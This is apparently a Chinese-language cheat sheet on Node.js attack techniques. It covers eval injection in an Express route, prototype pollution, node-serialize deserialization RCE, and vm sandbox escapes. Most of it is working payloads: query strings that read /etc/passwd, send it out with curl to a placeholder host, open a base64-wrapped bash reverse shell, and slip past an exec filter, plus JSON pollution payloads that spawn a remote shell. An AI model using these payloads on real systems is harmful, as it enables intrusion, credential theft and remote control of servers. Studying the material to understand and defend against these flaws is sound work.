toUpperCase(): 将小写转换为大写的函数 toLowerCase(): 将大写转换为小写的函数
// Minimal Express app used to demonstrate code injection through a query parameter.
var express = require('express');
var app = express();
// GET /eval?cmd=<code>
// The raw `cmd` query value is passed straight to eval(), so anyone who can
// reach this route runs arbitrary JavaScript inside the server process. The
// response is whatever the evaluated expression returns; the value is also
// echoed to the server log. Request data must never reach eval().
app.get('/eval', function(req, res){
res.send(eval(req.query.cmd));
console.log(req.query.cmd);
})
// Listen on port 8000 and print the instance URL (message text is Chinese).
var server = app.listen(8000, function(){
console.log("实例的地址在http://127.0.0.1:8000");
})
上面代码中,/eval 路由的 cmd 参数由请求方完全控制并直接传给 eval,因此可以传入任意 JavaScript 代码并在服务端执行
// windows中弹出计算机
?cmd=require('child_process').exec('calc');
// linux中读取敏感文件
?cmd=require('child_process').exec('curl -F "x=`cat /etc/passwd`" http://vps'); //没有回显的时候
?cmd=require('child_process').exec('cat /etc/passwd');
// 反弹shell
?cmd=require('child_process').exec('echo xxx|base64 -d|bash');
//其中的 xxx 是 bash -i >& /dev/tcp/vps/port 0>&1 base64加密之后的字符串
// 读取文件
?cmd=require('fs').readFileSync('xxx(文件名)', 'utf-8');
__filename
__dirname
过滤exec: 拼接exec绕过
?cmd=require('child_process')['exe'+'c']('ls')
?cmd=require('child_process')['exe'%2B'c']('ls')
其他命令
间隔两秒执行函数
setInterval(some_function, 2000)
两秒后执行函数
setTimeout(some_function, 2000)
输出
Function("console.log('xxx')")()
prototype是一个类的属性,所有实例化这个类的对象都拥有这个属性中的所有内容,包括变量和方法
__proto__是一个实例化对象的属性,指向对应类的prototype属性
为什么一个空对象的zoo,有bar属性?那是因为,zoo和foo的类都是Object类,通过__proto__修改了这个对象的原型,zoo就带有了bar属性。
如果能够控制对象(包括数组)的键名并进行写操作,就可以进行原型链污染。
对象merge
对象clone
//demo
// Recursively copies `source` into `target`: keys present on both sides are
// merged in place, every other key is assigned directly.
// Both `for...in` and the `in` operator see inherited properties, so a
// source object carrying an own "__proto__" key (JSON.parse produces one)
// makes the recursion descend into Object.prototype and write there — the
// prototype-pollution case shown in the demo below. A safe merge skips the
// keys "__proto__", "constructor" and "prototype" and only walks properties
// for which Object.hasOwn() is true.
function merge(target, source) {
for (let prop in source) {
if (!(prop in source) || !(prop in target)) {
target[prop] = source[prop];
continue;
}
merge(target[prop], source[prop]);
}
}
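// Demo: object2 is built by JSON.parse, so "__proto__" is an ordinary own
// key on it rather than the prototype accessor. merge() follows that key
// into Object.prototype, and object1 then reads "b" from the prototype.
const object1 = {};
const object2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}');
merge(object1, object2);
console.log(object1.a, object1.b);
// object3 is a fresh, unrelated object, yet it also sees "b": the write
// landed on the shared prototype. (The original leaked object3 as an
// implicit global; it is now a proper declaration.)
const object3 = {};
console.log(object3.b);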
{"__proto__":{"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process').exec('calc')//"}}
{"__proto__":{"sourceURL":"\nreturn e=> {for (var a in {}) {delete Object.prototype[a];} return global.process.mainModule.constructor._load('child_process').execSync('id')}\n//"}}
{"__proto__":{"compileDebug":1,"self":1,"line":"console.log(global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/xxx/6666 0>&1\"'))"}}
# Node.js runtime (nodejs-legacy supplies the plain "node" command name on older Debian-based systems)
sudo apt-get install nodejs
sudo apt-get install nodejs-legacy
# Print the installed Node.js version
node -v
# npm package manager
sudo apt-get install npm
# Print the installed npm version
npm -v
# Install the exact node-serialize release used by the examples below (0.0.4)
sudo npm install node-serialize@0.0.4 --save
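// index.js — shows why node-serialize's unserialize() cannot be used on
// data from outside: a serialized function is rebuilt with eval, and
// appending "()" to the serialized string makes that code run during
// unserialize() itself. (const replaces the implicit globals serResult/exp.)
const serialize = require('node-serialize');
const chybeta = {
vuln : function(){require('child_process').exec('whoami', function(error, stdout, stderr) {console.log(stdout);});},
};
// Serialize the object; the function source becomes a flagged string.
const serResult = serialize.serialize(chybeta);
console.log("serialize result:");
console.log(serResult+'\n');
// Round-tripping restores the function but does not invoke it.
console.log("Direct unserialize:")
serialize.unserialize(serResult);
console.log("\n");
// Insert "()" before the closing two characters so the function text
// becomes an immediately-invoked expression.
console.log("Use IIFE to PWN it:")
const exp = serResult.slice(0, -2) + "()" + serResult.slice(-2);
console.log(exp);
console.log("Exec whoami:")
serialize.unserialize(exp);
// node index.js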
// node index.js
// IIFE: `name` lives only inside the function scope and is not visible outside it.
(() => {
const name = "RoboTerh";
})();
// node-serialize's unserialize(): walks a parsed JSON tree and rebuilds
// values from specially prefixed strings. FUNCFLAG, CIRCULARFLAG and
// getKeyPath are defined elsewhere in the module.
exports.unserialize = function(obj, originObj) {
var isIndex;
// The outermost call receives the JSON text; recursive calls receive objects.
if (typeof obj === 'string') {
obj = JSON.parse(obj);
isIndex = true;
}
originObj = originObj || obj;
var circularTasks = [];
var key;
for(key in obj) {
if(obj.hasOwnProperty(key)) {
if(typeof obj[key] === 'object') {
obj[key] = exports.unserialize(obj[key], originObj);
} else if(typeof obj[key] === 'string') {
if(obj[key].indexOf(FUNCFLAG) === 0) {
// A string that starts with FUNCFLAG is handed to eval() verbatim,
// so whatever follows the flag in the input becomes executable code.
// This is the line that makes unserialize() unsafe on untrusted data.
obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');
} else if(obj[key].indexOf(CIRCULARFLAG) === 0) {
// Circular-reference markers are recorded here and resolved via
// getKeyPath() once the whole tree has been walked.
obj[key] = obj[key].substring(CIRCULARFLAG.length);
circularTasks.push({obj: obj, key: key});
}
}
}
}
// Only the outermost call resolves the recorded circular paths.
if (isIndex) {
circularTasks.forEach(function(task) {
task.obj[task.key] = getKeyPath(originObj, task.obj[task.key]);
});
}
return obj;
};
obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');
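// Prints the serialized form of an object that holds a function, to show
// what node-serialize's serialize() emits (output reproduced in the trailing
// comment). The function literal is kept verbatim because its source text is
// what ends up in the output. (const replaces the implicit global `serialize`.)
const serialize = require('node-serialize');
const test = {
exp : function(){
require('child_process').exec('ls /', function(error, stdout, stderr){
console.log(stdout)
});
},
};
console.log("序列化生成的payload:\n" + serialize.serialize(test));
// {"exp":"_$$ND_FUNC$$_function (){require('child_process').exec('ls /',function(error,stdout,stderr){console.log(stdout)});}"}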
{"exp":"_$$ND_FUNC$$_function (){require('child_process').exec('ls /',function(error,stdout,stderr){console.log(stdout)});}()"}
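// test2.js — feeds the serialized string (with "()" appended, see the
// payload above) back into unserialize(); the eval() inside unserialize()
// runs the function immediately, so any input reaching this call is
// effectively executable code. (const replaces the implicit globals.)
const serialize = require('node-serialize');
const payload = '{"exp":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\',function(error,stdout,stderr){console.log(stdout)});}()"}';
serialize.unserialize(payload);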
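# Build the image and start the container in the background
# (the original second line was misspelled "docler-compose")
docker-compose build
docker-compose up -d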
逃逸实例
// vm.runInNewContext() gives the code its own global object, but that
// object's constructor chain still leads back to the host, so the code can
// read the outer process's environment. Node's documentation is explicit
// that the vm module is not a security mechanism.
const vm = require("vm");
const leakedEnv = vm.runInNewContext(
"this.constructor.constructor('return this.process.env')()"
);
console.log(leakedEnv);
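// Same escape via the explicit Script/createContext API: an empty sandbox
// object still exposes a constructor chain leading to the host process.
// (const replaces the original implicit global `env`.)
const vm = require('vm');
const sandbox = {};
const script = new vm.Script("this.constructor.constructor('return this.process.env')()");
const context = vm.createContext(sandbox);
const env = script.runInContext(context);
console.log(env);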
// Two-statement variant: the first line obtains the host `process` object,
// the second uses it to run a command and return its output. The script text
// is identical to the original template literal (the newline is written as \n).
const vm = require("vm");
const output = vm.runInNewContext(
"const process = this.constructor.constructor('return this.process')();\nprocess.mainModule.require('child_process').execSync('whoami').toString()"
);
console.log(output);